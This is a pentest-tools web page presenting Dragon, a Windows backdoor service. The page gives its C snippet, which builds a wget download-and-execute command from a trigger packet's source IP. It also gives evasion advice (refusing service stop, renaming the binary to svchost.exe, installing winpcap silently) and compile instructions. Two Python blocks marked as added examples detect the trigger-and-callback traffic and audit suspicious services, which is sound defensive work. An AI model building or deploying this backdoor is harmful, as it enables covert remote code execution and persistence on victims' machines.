Pentest Tools

Published on June 14th, 2015


Windows Backdoor: Dragon — a sniffing, non-binding, reverse down/exec, portknocking service
Compiles as a Windows service. Once installed & started, it’ll listen (using winpcap) to all interfaces on the machine. If a packet comes across with the “magic source port”, it’ll reach out using wget to download and execute a binary based off of the source IP of the sender’s packet.

Dragon is a Windows app that is designed to be installed as a Windows service and will run at Windows boot. It will listen to the first interface available to the OS (if you have multiple interfaces, this will only listen on the first one). It will continuously listen to all traffic across this interface, and discard ALL packets it’s not interested in.


If a packet comes in with the Source Port of 12317, it will execute the following:

if (sport == 12317) { // Change this if you want it to listen on a different port.
    // Delete any previous copy of the payload before fetching a fresh one.
    remove( "c:\\windows\\system32\\x32.exe" );
    // Build the download command from the trigger packet's source address (ih->saddr).
    char cmd[255];
    sprintf(cmd, "\"c:\\windows\\system\\wget.exe https://%d.%d.%d.%d/x32.exe\"", ih->saddr.byte1, ih->saddr.byte2, ih->saddr.byte3, ih->saddr.byte4 );

First it will remove any file called x32.exe stored under c:\windows\system32\. Next, using wget.exe (you’ll need to install this on your own), it will download x32.exe from the host the magic happy packet was sent from. This means that even if the blue team firewalls off your attacking server, you can just change your IP and send your happy magic packet from the new IP; it’ll still work. Finally, it’ll execute it. Note that we are using system() to call our binary, which means the service will wait until the execution of x32.exe has finished before listening again for more happy packets. Lastly, the name of the exe and the source port are a matter of preference; if you’d like to use something else, just modify them in this function, and the rest of the code can remain untouched. As it stands, the “magic source port” is 12317. To change this, modify the accepted source port in the function “packet_handler”. Heck, you could put whatever you wanted here: shellcode to be executed, Windows commands like adding users to local administrators, etc. It’s pretty modular; I just wanted the ability to download and execute when needed.
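From the defender’s side, the behaviour just described has a distinctive two-step shape on the wire: an inbound packet whose source port is 12317 (any protocol, any destination port, and it still counts even if the host firewall drops it, since the sniffer sits below the firewall), followed shortly by the victim opening a connection back to that packet’s source address to fetch x32.exe. The following Python is an added detection example written for this page; it is not part of the Dragon source. It assumes a constructed one-line flow-record format, a 30-second correlation window and a monitored host of 10.0.0.5, all of which are assumptions, and it deliberately ignores replies sent back to port 12317, because a benign client can pick 12317 as its ephemeral port and the server’s reply must not be mistaken for a call-back.

```python
"""Correlate the Dragon trigger packet with the call-back download that follows it.

Added example for defenders; it is not part of the Dragon source. It assumes flow
records in a constructed one-line format:

    <epoch_seconds> <PROTO> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
"""
from collections import defaultdict
from dataclasses import dataclass

MAGIC_SPORT = 12317             # the "magic source port" from the page
CALLBACK_WINDOW_S = 30.0        # assumption: how long after a trigger a call-back still counts
MONITORED_HOSTS = {"10.0.0.5"}  # constructed: the hosts we are watching


@dataclass(frozen=True)
class Flow:
    ts: float
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def parse_flow(line: str) -> Flow:
    """Parse one constructed flow line into a Flow record."""
    ts, proto, src, arrow, dst = line.split()
    if arrow != "->":
        raise ValueError(f"bad flow line: {line!r}")
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return Flow(float(ts), proto.upper(), src_ip, int(src_port), dst_ip, int(dst_port))


def find_trigger_callbacks(lines):
    """Return one alert per trigger packet that was followed by a call-back.

    Trigger: any packet to a monitored host whose SOURCE port is MAGIC_SPORT. Protocol
    and destination port are irrelevant: the backdoor sniffs below the host firewall,
    so a packet the firewall drops still arms it.
    Call-back: the same host then opens a connection to the trigger's source IP within
    CALLBACK_WINDOW_S. Replies addressed to port MAGIC_SPORT are excluded, because a
    benign client may simply have chosen 12317 as its ephemeral port.
    """
    flows = sorted((parse_flow(l) for l in lines if l.strip()), key=lambda f: f.ts)
    pending = defaultdict(list)  # (host, trigger_src_ip) -> trigger timestamps
    alerts = []
    for f in flows:
        if f.dst_ip in MONITORED_HOSTS and f.src_port == MAGIC_SPORT:
            pending[(f.dst_ip, f.src_ip)].append(f.ts)
            continue
        if f.src_ip in MONITORED_HOSTS and f.dst_port != MAGIC_SPORT:
            key = (f.src_ip, f.dst_ip)
            for t in pending.get(key, []):
                if 0.0 <= f.ts - t <= CALLBACK_WINDOW_S:
                    alerts.append({"host": f.src_ip, "attacker": f.dst_ip,
                                   "trigger_ts": t, "callback_ts": f.ts,
                                   "callback_port": f.dst_port})
                    pending[key].remove(t)
                    break
    return alerts


# Constructed sample traffic: one real trigger + call-back, one benign coincidence.
SAMPLE_FLOWS = [
    "1434240000.0 TCP 198.51.100.7:12317 -> 10.0.0.5:445",  # trigger, even if 445 is firewalled
    "1434240001.2 TCP 10.0.0.5:49213 -> 198.51.100.7:443",  # host fetches x32.exe from the sender
    "1434240100.0 TCP 203.0.113.9:12317 -> 10.0.0.5:80",    # benign client using 12317 as ephemeral port
    "1434240100.1 TCP 10.0.0.5:80 -> 203.0.113.9:12317",    # the web server's reply: not a call-back
    "1434240150.0 TCP 10.0.0.5:49300 -> 203.0.113.9:443",   # 50 s later: outside the window
    "1434240200.0 UDP 192.0.2.4:53 -> 10.0.0.5:52000",      # unrelated DNS answer
]


def demo():
    """Run the correlation over the constructed sample and return the alerts."""
    return find_trigger_callbacks(SAMPLE_FLOWS)


if __name__ == "__main__":
    for a in demo():
        print(f"ALERT {a['host']} armed by {a['attacker']} at {a['trigger_ts']:.1f}, "
              f"called back on port {a['callback_port']} at {a['callback_ts']:.1f}")
```

Only the first pair in the sample produces an alert. The point of the correlation is that the trigger packet alone is a weak signal (source port 12317 will show up by chance in normal ephemeral-port traffic), while a host initiating an outbound connection to whoever just sent it that packet is not something a benign client does.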

Other things to note… This Windows service employs the following code:

ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN; // accept only the system-shutdown control, not STOP or PAUSE/CONTINUE

The ServiceStatus.dwControlsAccepted value tells the service which control requests it’ll accept from the user. Right now it’s set to only accept termination when told that the system is shutting down. This means the user cannot pause or stop the service, even if they are Administrator. The only way to kill/stop it is by using Task Manager to kill the process. To help blend in even further, it is recommended to rename dragon.exe to svchost.exe :).
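Both of the traits just described (a running service whose dwControlsAccepted mask omits SERVICE_ACCEPT_STOP, and an svchost.exe that does not live in the System32 directory) are visible from the service control manager and can be audited. The following Python is an added example for defenders and is not part of Dragon. The SERVICE_ACCEPT_* constants are the real Win32 bit values; the service records, directory list and service names are constructed stand-ins for what a query of the SCM would return. Note the caveat the sample shows: some legitimate system services also refuse STOP, so the mask alone is a prompt to look closer, and the image path is the corroborating signal.

```python
"""Audit service records for a control mask that refuses STOP and for an svchost.exe
living outside System32.

Added example for defenders; not part of Dragon. The SERVICE_ACCEPT_* constants are the
real Win32 values; the service records below are constructed.
"""

SERVICE_ACCEPT_STOP = 0x00000001
SERVICE_ACCEPT_PAUSE_CONTINUE = 0x00000002
SERVICE_ACCEPT_SHUTDOWN = 0x00000004

_CONTROL_NAMES = (
    (SERVICE_ACCEPT_STOP, "STOP"),
    (SERVICE_ACCEPT_PAUSE_CONTINUE, "PAUSE_CONTINUE"),
    (SERVICE_ACCEPT_SHUTDOWN, "SHUTDOWN"),
)

# Assumption: the only directories a genuine svchost.exe is expected to run from.
LEGIT_SVCHOST_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def decode_controls(mask: int) -> list:
    """Names of the controls a service accepts, from its dwControlsAccepted bitmask."""
    return [name for bit, name in _CONTROL_NAMES if mask & bit]


def image_exe_path(image_path: str) -> str:
    """Strip arguments from an SCM image path, honouring a quoted executable path."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def audit_service(svc: dict) -> list:
    """Return the reasons a service record deserves a closer look (empty if none)."""
    reasons = []
    mask = svc["controls_accepted"]
    if svc["state"] == "RUNNING" and not mask & SERVICE_ACCEPT_STOP:
        accepted = ", ".join(decode_controls(mask)) or "nothing"
        reasons.append(f"running but accepts only: {accepted}")
    exe = image_exe_path(svc["image_path"]).lower()
    if exe.endswith("\\svchost.exe") and not exe.startswith(LEGIT_SVCHOST_DIRS):
        reasons.append(f"svchost.exe outside System32: {exe}")
    return reasons


def audit(services) -> dict:
    """Map service name -> reasons, for every service that has at least one."""
    findings = {}
    for svc in services:
        reasons = audit_service(svc)
        if reasons:
            findings[svc["name"]] = reasons
    return findings


# Constructed records standing in for an SCM enumeration.
SAMPLE_SERVICES = [
    {"name": "Dnscache", "state": "RUNNING", "controls_accepted": 0x7,
     "image_path": "C:\\Windows\\system32\\svchost.exe -k NetworkService"},
    {"name": "CoreSvcNoStop", "state": "RUNNING", "controls_accepted": 0x4,
     "image_path": "C:\\Windows\\System32\\svchost.exe -k DcomLaunch"},   # legit-looking, refuses STOP
    {"name": "VendorAgent", "state": "RUNNING", "controls_accepted": 0x5,
     "image_path": '"C:\\Program Files\\Vendor\\agent.exe" --svc'},
    {"name": "DragonSvc", "state": "RUNNING", "controls_accepted": 0x4,
     "image_path": "C:\\Windows\\Temp\\svchost.exe"},                      # renamed dragon.exe
]


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_SERVICES).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

Run as-is it reports CoreSvcNoStop with one reason and DragonSvc with two; Dnscache and VendorAgent are clean. A service that hits both heuristics is the one to pull the binary from and examine.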



  1. This runs at a layer that is lower than the host firewall.
  2. This exe does require that the libpcap driver be installed on the victim’s machine. A reboot is NOT needed for this, but a silent install of winpcap is recommended.
  3. This code will compile (use MinGW) for both 32-bit and 64-bit executables. It has been successfully run on:
    1. Windows XP 32 bit
    2. Windows 7 32 bit
    3. Windows 7 64 bit
    4. Windows 8 64 bit
    5. Windows 2000 server 32 bit (for fun)
    6. Windows 2003 server 32 bit
    7. Windows 2012 Server 64 bit
  4. It does not work for IPv6 networks because…ew.



git clone

To compile use MinGW’s version of gcc.

You will need to have installed or reference the path to the libpcap and WpdPack Libraries.

gcc.exe -v -I c:\Path\To\WpdPack\Include -L c:\Path\To\WpdPack\lib dragon.c -L/usr/local/lib -lwpcap -lws2_32 -static -o dragon.exe

Note: This has been tested and works under both 32- and 64-bit versions of Windows ranging from XP to Win8 and Server 2k3 to Server 2k12.


Source && Download
